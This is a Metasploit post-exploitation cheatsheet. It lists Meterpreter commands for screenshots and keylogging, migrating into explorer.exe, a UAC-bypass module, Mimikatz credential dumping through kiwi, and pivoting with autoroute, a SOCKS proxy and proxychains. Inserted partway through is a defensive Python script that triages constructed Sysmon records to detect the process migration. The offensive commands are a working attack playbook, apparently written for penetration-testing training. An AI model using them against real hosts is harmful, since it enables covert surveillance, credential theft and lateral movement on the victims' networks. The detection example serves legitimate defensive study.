Post Exploitation
Core Features
Take a screenshot of the compromised desktop:
meterpreter > screenshot
Start a keylogger:
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop
Migrating Processes
When we compromise a host, our Meterpreter payload is executed inside the process of the application we attack. If the victim closes that process, our access to the machine is closed as well.
Using the migrate command, we can move the execution of our Meterpreter to a different process. To do this, we first run ps to view all running processes, pick one, like explorer.exe, and issue the migrate command:
meterpreter > ps
meterpreter > migrate <explorer.exe_id>
Or, we can set an autorun script before running the module:
msf6 exploit(multi/handler) > set AutoRunScript post/windows/manage/migrate
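Where this migration shows up on the defender's side, as an added example that is not part of this cheatsheet: a Python triage over constructed Sysmon Event ID 8 (CreateRemoteThread) records that flags a remote thread created in explorer.exe from memory no on-disk module backs. The key=value record layout, the sample records and the benign-source allow-list are assumptions.

```python
"""Triage constructed Sysmon Event ID 8 (CreateRemoteThread) records for the
migration pattern above: a remote thread created in a long-lived process such
as explorer.exe whose start address is not backed by any module on disk."""
import re
from dataclasses import dataclass

# Long-lived user processes that an implant commonly migrates into.
COMMON_MIGRATION_TARGETS = {"explorer.exe", "svchost.exe", "notepad.exe"}
# Sources that create remote threads in normal Windows operation
# (assumption: tune this allow-list per environment).
BENIGN_SOURCES = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}
# Record layout is a constructed key=value simplification of the Sysmon fields.
FIELD_RE = re.compile(r"(\w+)=(\S*)")

@dataclass
class RemoteThreadEvent:
    source_image: str
    target_image: str
    start_module: str  # "-" or empty when the thread starts in unbacked memory

def parse_event(line: str) -> RemoteThreadEvent:
    """Parse one record into an event; paths are lower-cased for comparison."""
    fields = dict(FIELD_RE.findall(line))
    return RemoteThreadEvent(
        source_image=fields.get("SourceImage", "").lower(),
        target_image=fields.get("TargetImage", "").lower(),
        start_module=fields.get("StartModule", "").lower(),
    )

def is_suspicious(ev: RemoteThreadEvent) -> bool:
    """Thread injected into a common migration target by a non-allow-listed
    source, starting in memory that no on-disk module backs."""
    if ev.source_image in BENIGN_SOURCES:
        return False
    target_name = ev.target_image.rsplit("\\", 1)[-1]
    unbacked = ev.start_module in ("", "-")
    return target_name in COMMON_MIGRATION_TARGETS and unbacked

def triage(lines):
    """Return the events an analyst should look at first."""
    return [ev for ev in map(parse_event, lines) if is_suspicious(ev)]

# Constructed sample records (not real telemetry): implant -> explorer.exe,
# a benign csrss.exe thread, and a svchost.exe thread backed by ntdll.dll.
SAMPLE_LOG = [
    r"EventID=8 SourceImage=C:\Users\bob\Downloads\update.exe TargetImage=C:\Windows\explorer.exe StartModule=- StartFunction=-",
    r"EventID=8 SourceImage=C:\Windows\System32\csrss.exe TargetImage=C:\Windows\explorer.exe StartModule=- StartFunction=-",
    r"EventID=8 SourceImage=C:\Windows\System32\svchost.exe TargetImage=C:\Windows\explorer.exe StartModule=C:\Windows\System32\ntdll.dll StartFunction=RtlUserThreadStart",
]
```

Only the first record survives triage: the other two are dropped by the allow-list and by the on-disk StartModule respectively.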
Modules
Bypass UAC:
msf6 > use exploit/windows/local/bypassuac_injection_winsxs
PowerShell:
meterpreter > load powershell
meterpreter > powershell_execute "$PSVersionTable.PSVersion"
Mimikatz:
meterpreter > load kiwi
meterpreter > getsystem
meterpreter > creds_msv
Pivoting
Enumerate network interfaces:
C:\Windows\system32>ipconfig
Found two network interfaces:

We are on 192.168.214.10 and we want to pivot to 172.16.214.10. Use autoroute:
msf6 > use multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set session 1
msf6 post(multi/manage/autoroute) > run
Use auxiliary/server/socks_proxy to configure a SOCKS proxy:
msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set VERSION 4a
Configure proxychains at /etc/proxychains4.conf:

Now we can run commands with proxychains as a prefix to pivot. For example:
proxychains rdesktop 172.16.214.5